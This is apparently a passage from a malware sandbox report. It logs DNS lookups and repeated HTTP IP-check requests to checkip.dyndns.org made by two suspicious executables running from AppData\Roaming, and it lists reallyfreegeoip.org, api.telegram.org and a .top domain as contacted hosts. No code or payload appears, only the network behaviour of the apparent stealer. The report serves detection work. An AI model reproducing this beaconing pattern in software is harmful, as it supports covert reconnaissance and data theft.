                                              Jul 26, 2024 23:45:52.393100023 CEST8.8.8.8192.168.2.220xe4aNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:52.393100023 CEST8.8.8.8192.168.2.220xe4aNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:52.393100023 CEST8.8.8.8192.168.2.220xe4aNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:52.873044968 CEST8.8.8.8192.168.2.220x960No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:52.873044968 CEST8.8.8.8192.168.2.220x960No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:53.530426979 CEST8.8.8.8192.168.2.220x4e26No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false

                                              HTTP Request Dependency Graph

                                              • meridianresourcellc.top
                                              • reallyfreegeoip.org
                                              • api.telegram.org
                                              • checkip.dyndns.org

                                              HTTP Packets

                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              0192.168.2.2249171132.226.247.73803880C:\Users\user\AppData\Roaming\swagodi78811.scr
                                              TimestampBytes transferredDirectionData
                                              Jul 26, 2024 23:45:28.321165085 CEST151OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Connection: Keep-Alive
                                              Jul 26, 2024 23:45:28.967530012 CEST320INHTTP/1.1 200 OK
                                              Date: Fri, 26 Jul 2024 21:45:28 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: cf369e6b2e2ee83bcbc681c3b73cd316
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                              Jul 26, 2024 23:45:29.175510883 CEST320INHTTP/1.1 200 OK
                                              Date: Fri, 26 Jul 2024 21:45:28 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: cf369e6b2e2ee83bcbc681c3b73cd316
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                              Jul 26, 2024 23:45:30.462775946 CEST127OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Jul 26, 2024 23:45:30.671293020 CEST320INHTTP/1.1 200 OK
                                              Date: Fri, 26 Jul 2024 21:45:30 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: 9bfbb0a10ff96123f322d45128c1a25c
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                              Jul 26, 2024 23:45:30.886786938 CEST320INHTTP/1.1 200 OK
                                              Date: Fri, 26 Jul 2024 21:45:30 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: 9bfbb0a10ff96123f322d45128c1a25c
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                              Jul 26, 2024 23:45:34.019804955 CEST127OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Jul 26, 2024 23:45:34.230139017 CEST320INHTTP/1.1 200 OK
                                              Date: Fri, 26 Jul 2024 21:45:34 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: daff2905da8d2155d078d7adf0b6b577
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                              Jul 26, 2024 23:45:34.439461946 CEST320INHTTP/1.1 200 OK
                                              Date: Fri, 26 Jul 2024 21:45:34 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: daff2905da8d2155d078d7adf0b6b577
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1192.168.2.2249174193.122.130.0803880C:\Users\user\AppData\Roaming\swagodi78811.scr
                                              TimestampBytes transferredDirectionData
                                              Jul 26, 2024 23:45:35.209233046 CEST127OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Jul 26, 2024 23:45:35.669509888 CEST320INHTTP/1.1 200 OK
                                              Date: Fri, 26 Jul 2024 21:45:35 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: cc568803fb6a289f7cb542e227592f1e
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              2192.168.2.2249176158.101.44.242802060C:\Users\user\AppData\Roaming\gRpkBp.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 26, 2024 23:45:36.649858952 CEST151OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Connection: Keep-Alive
                                              Jul 26, 2024 23:45:37.202109098 CEST320INHTTP/1.1 200 OK
                                              Date: Fri, 26 Jul 2024 21:45:37 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: 8442a7ac0e46db336ba63d2e8e2667e1
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                              Jul 26, 2024 23:45:37.415529966 CEST320INHTTP/1.1 200 OK
                                              Date: Fri, 26 Jul 2024 21:45:37 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: 8442a7ac0e46db336ba63d2e8e2667e1
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                              Jul 26, 2024 23:45:37.488856077 CEST127OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Jul 26, 2024 23:45:37.848849058 CEST320INHTTP/1.1 200 OK
                                              Date: Fri, 26 Jul 2024 21:45:37 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: 8a762f5a7b51b7db456e12570a1407e6
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                              Jul 26, 2024 23:45:38.902432919 CEST127OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Jul 26, 2024 23:45:39.061602116 CEST320INHTTP/1.1 200 OK
                                              Date: Fri, 26 Jul 2024 21:45:38 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: 29dfd82e1771c59777ec83c4e67431ee
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              3192.168.2.2249177193.122.6.168803880C:\Users\user\AppData\Roaming\swagodi78811.scr
                                              TimestampBytes transferredDirectionData
                                              Jul 26, 2024 23:45:36.780706882 CEST127OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Jul 26, 2024 23:45:39.412964106 CEST730INHTTP/1.1 502 Bad Gateway
                                              Date: Fri, 26 Jul 2024 21:45:39 GMT
                                              Content-Type: text/html
                                              Content-Length: 547
                                              Connection: keep-alive
                                              X-Request-ID: 16364d37ae25a9fe5ccbe2cb99c6ccce
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 [TRUNCATED]
                                              Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center></center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                              Jul 26, 2024 23:45:39.432930946 CEST127OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Jul 26, 2024 23:45:40.719506025 CEST320INHTTP/1.1 200 OK
                                              Date: Fri, 26 Jul 2024 21:45:40 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: c34cc12915724a1e95970801e2af4caa
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                              Jul 26, 2024 23:45:40.927472115 CEST320INHTTP/1.1 200 OK
                                              Date: Fri, 26 Jul 2024 21:45:40 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: c34cc12915724a1e95970801e2af4caa
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              4192.168.2.2249180193.122.6.168802060C:\Users\user\AppData\Roaming\gRpkBp.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 26, 2024 23:45:39.872224092 CEST127OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Jul 26, 2024 23:45:41.517668009 CEST320INHTTP/1.1 200 OK
                                              Date: Fri, 26 Jul 2024 21:45:41 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: d799f47d8bfb2cb5131f520a3987fe38
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              5192.168.2.2249182193.122.6.168803880C:\Users\user\AppData\Roaming\swagodi78811.scr
                                              TimestampBytes transferredDirectionData
                                              Jul 26, 2024 23:45:41.424787045 CEST127OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Jul 26, 2024 23:45:42.081131935 CEST320INHTTP/1.1 200 OK
                                              Date: Fri, 26 Jul 2024 21:45:41 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: 73915a61552b4bb9a2d257ac1a11b9d0
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                              Jul 26, 2024 23:45:42.291476011 CEST320INHTTP/1.1 200 OK
                                              Date: Fri, 26 Jul 2024 21:45:41 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: 73915a61552b4bb9a2d257ac1a11b9d0
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              6192.168.2.2249184132.226.8.169803880C:\Users\user\AppData\Roaming\swagodi78811.scr
                                              TimestampBytes transferredDirectionData
                                              Jul 26, 2024 23:45:42.547310114 CEST151OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Connection: Keep-Alive
                                              Jul 26, 2024 23:45:43.327135086 CEST272INHTTP/1.1 200 OK
                                              Date: Fri, 26 Jul 2024 21:45:43 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                              Jul 26, 2024 23:45:43.539527893 CEST272INHTTP/1.1 200 OK
                                              Date: Fri, 26 Jul 2024 21:45:43 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              7192.168.2.2249185193.122.6.168802060C:\Users\user\AppData\Roaming\gRpkBp.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 26, 2024 23:45:42.548789978 CEST151OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Connection: Keep-Alive
                                              Jul 26, 2024 23:45:44.186233044 CEST320INHTTP/1.1 200 OK
                                              Date: Fri, 26 Jul 2024 21:45:44 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: 5591e8efab600566dfc849052e1c1a8b
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                              Jul 26, 2024 23:45:44.395447969 CEST320INHTTP/1.1 200 OK
                                              Date: Fri, 26 Jul 2024 21:45:44 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: 5591e8efab600566dfc849052e1c1a8b
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              8192.168.2.2249187158.101.44.242803880C:\Users\user\AppData\Roaming\swagodi78811.scr
                                              TimestampBytes transferredDirectionData
                                              Jul 26, 2024 23:45:44.480416059 CEST127OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Jul 26, 2024 23:45:45.059883118 CEST320INHTTP/1.1 200 OK
                                              Date: Fri, 26 Jul 2024 21:45:44 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: 25b1603cff26c8871a24ad2d29248270
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              9192.168.2.2249190193.122.6.168802060C:\Users\user\AppData\Roaming\gRpkBp.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 26, 2024 23:45:45.178761959 CEST151OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Connection: Keep-Alive
                                              Jul 26, 2024 23:45:46.833507061 CEST320INHTTP/1.1 200 OK
                                              Date: Fri, 26 Jul 2024 21:45:46 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: ec5a3eca9f3b6b326c167937f545a709
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
